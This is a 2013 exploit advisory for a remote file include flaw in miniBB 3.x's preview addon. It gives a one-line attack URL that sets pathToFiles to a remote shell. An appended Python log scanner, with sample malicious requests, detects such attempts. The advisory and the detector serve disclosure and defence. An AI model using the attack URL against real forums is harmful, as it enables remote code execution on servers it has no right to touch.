Channel: BOT24

miniBB 3.x Addon preview Remote File Include Vulnerability


# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux

------------------------------------------------------------------------

I found vulnerable code in file addon_preview.php, line 12.

So an attacker can use it to compromise the system.

The parameter that is not declared before the require is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------

Greetings from cold Germany, bd0rk.

==> REST IN PEACE AARON SWARTZ <==
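
To check whether the request pattern described above has reached a server, the following added example (not part of the original advisory; the log lines, addresses and host name are constructed) scans combined-format access logs for addon_preview.php requests that carry pathToFiles in the query string. It assumes a stock install never passes that parameter in the URL, and it only sees the query-string form, since access logs do not record request bodies.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Schemes and stream wrappers that point an include path away from local files.
REMOTE_RE = re.compile(r"^(?:https?|ftps?|php|data|expect|zip|phar)(?:://|:)", re.I)

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE = [
    '203.0.113.7 - - [27/Jan/2013:10:00:01 +0100] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Jan/2013:10:00:02 +0100] "POST /forum/addon_preview.php HTTP/1.1" 200 812',
    '198.51.100.9 - - [27/Jan/2013:10:03:10 +0100] "GET /forum/addon_preview.php?pathToFiles=./ HTTP/1.1" 200 812',
    '198.51.100.9 - - [27/Jan/2013:10:03:11 +0100] "GET /forum/addon_preview.php?pathToFiles=http://example.invalid/x.txt? HTTP/1.1" 200 64',
    '198.51.100.9 - - [27/Jan/2013:10:03:12 +0100] "GET /forum/addon_preview.php?pathToFiles=%2568ttp%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 64',
]

def classify(line):
    """Return None, 'suspicious' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not unquote(url.path).endswith("/addon_preview.php"):
        return None
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "pathToFiles":  # PHP variable names are case-sensitive
            continue
        # Any externally supplied value for this variable is worth a look.
        verdict = verdict or "suspicious"
        # parse_qsl decoded once; decode again to catch double encoding.
        if REMOTE_RE.match(value.strip()) or REMOTE_RE.match(unquote(value).strip()):
            verdict = "remote-include"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE):
        print(f"line {n}: {verdict}")
```

A "suspicious" hit means the variable was set from the URL with a local-looking value; "remote-include" means the value names a remote scheme or stream wrapper and the host should be reviewed for what the include returned.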



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this informatio
